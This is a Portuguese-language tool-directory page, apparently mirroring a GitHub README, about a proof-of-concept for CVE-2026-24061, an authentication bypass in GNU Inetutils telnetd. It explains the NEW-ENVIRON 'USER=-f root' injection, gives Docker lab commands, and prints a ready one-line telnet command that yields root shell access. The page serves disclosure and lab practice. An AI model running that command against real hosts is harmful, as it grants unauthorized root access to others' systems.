Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-24061 — Exploit de prova de conceito para bypass de autenticação no telnetd do GNU Inetutils (CVE-2026-24061) com configuração de laboratório Docker e PoC em Go. Explora a opção NEW-ENVIRON para obter shell root. | Kitploit
Ferramentas/GitHubGitHub/chocapikk/cve-2026-24061
Autenticação e AutorizaçãoAnálise de VulnerabilidadesExploraçãoSegurança de RedeTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubchocapikk/cve-2026-24061

CVE-2026-24061

Exploit de prova de conceito para bypass de autenticação no telnetd do GNU Inetutils (CVE-2026-24061) com configuração de laboratório Docker e PoC em Go. Explora a opção NEW-ENVIRON para obter shell root.

Ver Repositório
1234há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-24061

GNU Inetutils telnetd Bypass de Autenticação Remota

Sério, telnet em 2026? Qual é, pessoal, está na hora de evoluir. SSH existe desde 1995. 🤦

Descrição

Uma vulnerabilidade crítica de bypass de autenticação no telnetd do GNU Inetutils afetando as versões 1.9.3 a 2.7.

A vulnerabilidade explora a opção telnet NEW-ENVIRON para injetar argumentos maliciosos em login(1). Ao definir USER=-f root via protocolo telnet, um atacante pode contornar a autenticação e obter um shell root sem credenciais.

Versões Afetadas

  • GNU Inetutils 1.9.3 - 2.7

Detalhes Técnicos

O protocolo telnet suporta a opção NEW-ENVIRON (RFC 1572) que permite ao cliente enviar variáveis de ambiente para o servidor. O daemon telnetd passa a variável USER para login(1) como argumento.

Ao enviar USER=-f root, o valor é interpretado como:

  • Flag -f: Pular autenticação (host confiável)
  • root: Usuário alvo

Isto faz com que login -f root seja executado, concedendo acesso root imediato.

O PoC detecta a exploração bem-sucedida verificando IAC WILL ECHO (0xff 0xfb 0x01) - o sinal de protocolo que o servidor envia quando o acesso ao shell é concedido.

Configuração do Laboratório

root@kitploit:~
# Build and run the vulnerable telnetd container
docker compose up --build -d

# Test the exploit
go run poc.go 127.0.0.1 2323

Exploração

root@kitploit:~
# Using the Go PoC (with interactive shell)
go run poc.go <target> <port>

# Simple PoC using standard telnet client
env USER='-f root' telnet -a <target> <port>

Mitigação

  • Pare de usar telnet em 2026, sério 🙏
  • Use SSH em vez disso (já existe há 31 anos, eu nem tinha nascido em 95 kkk)
  • Atualize para uma versão corrigida do GNU Inetutils
  • Restrinja o acesso telnet por meio de regras de firewall

Arquivos

  • poc.go - Exploit em Go com shell interativo
  • Dockerfile - Contêiner telnetd vulnerável
  • docker-compose.yml - Orquestração do laboratório

Referências

  • Aviso: https://www.openwall.com/lists/oss-security/2026/01/20/2
  • GNU Inetutils: https://www.gnu.org/software/inetutils/
  • RFC 1572 (NEW-ENVIRON): https://tools.ietf.org/html/rfc1572

Créditos

  • LeakIX Research Team
Baixar ferramenta